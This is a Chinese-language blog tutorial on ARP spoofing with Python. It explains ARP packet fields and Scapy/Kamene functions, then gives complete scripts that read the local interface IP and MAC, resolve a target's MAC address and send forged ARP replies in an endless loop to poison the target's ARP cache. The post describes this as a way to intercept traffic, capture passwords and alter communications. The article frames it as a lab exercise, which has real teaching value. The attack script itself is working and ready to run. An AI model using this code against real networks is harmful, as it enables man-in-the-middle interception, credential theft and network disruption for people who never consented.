美文网首页python开发
Python网络编程1--实现ARP欺骗

Python网络编程1--实现ARP欺骗

作者: 净坛使者_猪悟能 | 来源:发表于2021-08-08 10:51 被阅读0次

    一、ARP报文结构

       ARP(地址解析协议)是根据IP地址获取物理地址的一个TCP/IP协议。
    报文结构

    ARP报文结构

    字段解释

    • Ethernet Address of destination
      长度:48比特
      含义:目的以太网地址。发送ARP请求时,为广播的MAC地址0xFF.FF.FF.FF.FF.FF。
    • Ethernet Address of sender
      长度:48比特
      含义:源以太网地址。
    • Frame Type
      长度:16比特
      含义:表示后面数据的类型。对于ARP请求或应答来说,该字段的值为0x0806。
    • Hardware Type
      长度:16比特
      含义:表示硬件地址的类型。对于以太网,该类型的值为“1”。
    • Protocol Type
      长度:16比特
      含义:表示发送方要映射的协议地址类型。对于IP地址,该值为0x0800。
    • Hardware Length
      长度:8比特
      含义:表示硬件地址的长度,单位是字节。对于ARP请求或应答来说,该值为6。
    • Protocol Length
      长度: 8比特
      含义:表示协议地址的长度,单位是字节。对于ARP请求或应答来说,该值为4。
    • OP
      长度:16比特
      操作类型:
        1 ARP请求
        2 ARP应答
        3 RARP请求
        4 RARP应答
    • Ethernet Address of sender
      长度:48比特
      含义:发送方以太网地址。这个字段和ARP报文首部的源以太网地址字段是重复信息。
    • IP Address of sender
      长度:32比特
      发送方的IP地址。
    • Ethernet Address of destination
      长度:48比特
      含义:接收方的以太网地址。发送ARP请求时,该处填充值为0x00.00.00.00.00.00。
    • IP Address of destination
      长度:32比特
      含义:接收方的IP地址。

    二、Scapy相关函数介绍

      Scapy是基于Python语言的网络报文处理程序,它可以让用户发送、嗅探、解析、以及伪造网络报文,运用Scapy可以进行网路侦测、端口扫描、路由追踪、以及网络攻击。Kamene是Scapy的分支,一开始的Scapy并不支持Python 3,为了支持Python 3就诞生了Scapy3k这个分支,为了方便区分就把Scapy3k更名为了Kamene。注意:最新的Scapy是支持Python 3的(Scapy 2.4.0+)。

    • 收发数据包
      • 发送并接收数据包(sr)
        sr():发送三层数据包,等待接受一个或者多个数据包的响应。
        sr1( ):发送三层数据包,并仅仅只等待接受一个数据包的响应。
        srp():发送二层数据包,并且等待响应。
      • 发送数据包
        send():仅仅发送三层数据包,系统会自动处理路由和二层信息。
        sendp():发送二层数据包。

      带p字母的都是发送二层数据包,必须要写以太网头部Ether(),而且如果是多接口一定要指定接口不带p字母都是发送三层数据包,不需要填Ether头部,不需要指定接口。

    • 对数据包进行解析
      • srp()
        返回的结果是一个元组,第一个元素表示回复的结果,第二个元素表示无响应的结果
      • res()
        对返回的数据包生成一个list
      • haslayer()
        用于判断是否存在该层数据
      • getlayer()
        返回该层数据
      • fields()
        把数据包内容生成一个字典数据类型

    三、实现ARP扫描

    3.1 ARP扫描原理

      假设A(10.0.1.2)与C(10.0.1.1)在同一局域网,A要和C实现通信。A首先会发送一个数据包到广播地址(10.0.1.255),该数据包中包含了源IP(A)、源MAC、目的IP(C)、目的MAC,这个数据包会被发放给局域网中所有的主机,但是只有C主机会回复一个包含了源IP()、源MAC、目的IP(A)、目的MAC的数据包给A,同时A主机会将返回的这个地址保存在ARP缓存表中。
      ARP攻击就是通过伪造IP地址和MAC地址实现ARP欺骗,能够在网络中产生大量的ARP响应,攻击者只要持续不断的发出伪造的ARP响应包就能更改目标主机ARP缓存中的IP-MAC条目,造成网络中断或中间人攻击。攻击者B向电脑A发送一个伪造的ARP响应,告诉电脑A:电脑C的IP地址10.0.1.1对应的MAC地址是B.B.B.B,电脑A信以为真,将这个对应关系写入自己的ARP缓存表中,以后发送数据时,将本应该发往电脑B的数据发送给了攻击者。同样的,攻击者B向电脑C也发送一个伪造的ARP响应,告诉电脑C:电脑C的IP地址10.0.1.1对应的MAC地址是B.B.B.B,电脑C也会将数据发送给攻击者。至此攻击者就控制了电脑A和电脑C之间的流量,他可以选择被动地监测流量,获取密码和其他涉密信息,也可以伪造数据,改变电脑A和电脑C之间的通信内容。


    ARP欺骗

    3.2 实验环境

      实验所使用的攻击主机系统为为Censtos7,使用两张网卡,因此需要单独获取不同网卡的信息。

    3.3 Python 实现

    • 获取主机接口的IP地址
      使用Python脚本GET_IP.py,其内容如下:
    #!/usr/bin/python3
    # -*- coding=utf-8 -*-
    
    import socket
    import fcntl
    import struct
      
    def get_ip_address(ifname):
        s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        return socket.inet_ntoa(fcntl.ioctl(
            s.fileno(),
            0x8915,  # SIOCGIFADDR
            struct.pack('256s', (ifname[:15]).encode())
        )[20:24])
    
    • 获取主机接口的MAC地址
      使用Python脚本GET_MAC.py,其内容如下:
    #!/usr/bin/python3
    # -*- coding=utf-8 -*-
    
    import os
    import re#导入正则表达式模块
    import optparse
    
    def get_mac_address(iface):#定义获取MAC地址的模块,传入接口名字
        """获取接口MAC"""
        #data = commands.getoutput("ifconfig " + iface)
        data = os.popen("ifconfig " + iface).read()#运行linux系统命令‘ifconfig’,并且读取输出信息赋值到data
        words = data.split()#把data中的数据通过空格分隔,并且产生清单
        found = 0#是否找到MAC地址
        location = 0#搜索清单的位置记录
        index = 0#MAC地址所在清单中的位置
        for x in words:#遍历整个清单
            if re.match('\w\w:\w\w:\w\w:\w\w:\w\w:\w\w', x):#匹配MAC地址字段
                found = 1#MAC地址被找到
                index = location#记录MAC地址出现的位置
                break#跳出循环
            else:#如果没有匹配MAC地址字段
                location = location + 1#继续执行循环,收索下一个位置,所以location需要加1
        if found == 1:#如果MAC地址被找到
            mac = words[index]#提取清单中MAC地址(通过记录的位置),并且赋值到mac
        else:#如果没有找到MAC地址
            mac = 'Mac not found'#返回MAC地址没找到的信息
        return mac#返回mac
    
    • 实现ARP欺骗
      具体实现脚本如下:
    from kamene.all import *
    from Network.Tools.GET_IP import get_ip_address
    from Network.Tools.GET_MAC import get_mac_address #导入获取本机MAC地址方法
    import time
    
    global localip, localmac, ip_1_mac, ip_2_mac, g_ip_1, g_ip_2, g_ifname
    
    def get_arp(ip_address, ifname):
        '''
          获取IP地址对应的MAC地址
        '''
        #获取本机IP地址
        localip = get_ip_address(ifname)
        #获取本机MAC地址
        localmac = get_mac_address(ifname)
        pkt=Ether(src=localmac, dst='FF:FF:FF:FF:FF:FF')/ARP(op=1, hwsrc=localmac, hwdst='00:00:00:00:00:00', psrc=localip, pdst=ip_address)
        #发送ARP请求并等待响应,超时时间:timeout=1
        result_raw = srp(pkt, timeout=1,iface = ifname, verbose = False)
        #把响应的数据包对,产生为清单
        result_list = result_raw[0].res
        #[0]第一组响应数据包
        #[1]接受到的包,[0]为发送的数据包
        #[1]ARP头部字段中的['hwsrc']字段,作为返回值返回
        mac=str(result_list[0][1].getlayer(ARP).fields['hwsrc'])
        return mac
    def arp_spoof(ip_1, ip_2, ifname):
        '''
         用本机的MAC去替换被攻击主机arp表中被毒化IP的MAC
        '''
        #global localip,localmac,ip_1_mac,ip_2_mac,g_ip_1,g_ip_2,g_ifname #申明全局变量
        g_ip_1 = ip_1 #为全局变量赋值,g_ip_1为被毒化ARP设备的IP地址
        g_ip_2 = ip_2 #为全局变量赋值,g_ip_2为本机伪装设备的IP地址
        g_ifname = ifname #为全局变量赋值,攻击使用的接口名字
        #获取本机IP地址,并且赋值到全局变量localip
        localip = get_ip_address(ifname)
        #获取本机MAC地址,并且赋值到全局变量localmac
        localmac = get_mac_address(ifname)
        #获取ip_1的真实MAC地址
        ip_1_mac = get_arp(ip_1,ifname)
        while True:#一直攻击,直到ctl+c出现!!!
            #op=2,响应ARP
            pkt=Ether(src=localmac, dst=ip_1_mac) / ARP(op=2, hwsrc=localmac, hwdst=ip_1_mac, psrc=g_ip_2, pdst=g_ip_1)
            # sendp(pkt)方式,根据二层发包,但不接收响应包
            sendp(pkt, iface = g_ifname, verbose = False)
            print("发送ARP欺骗数据包!欺骗" + ip_1 + '本地MAC地址为' + ip_2 + '的MAC地址!!!')
            time.sleep(1)
    
    if __name__ == "__main__":
        ip1=input("攻击目标IP>>>")
        ifname=input("接口名称>>>")
        ip2=input("毒化的IP>>>")
        arp_spoof(ip1, ip2, ifname)
    
    • 执行效果
      使用Pycharm运行结果如下
      Pycharm执行
      在linux接口下使用Tcpdump抓包如下,向目标主机发送大量arp reply刷新其arp表。
      TCP dump抓包

    相关文章

      网友评论

        本文标题:Python网络编程1--实现ARP欺骗

        本文链接:https://www.haomeiwen.com/subject/ertzvltx.html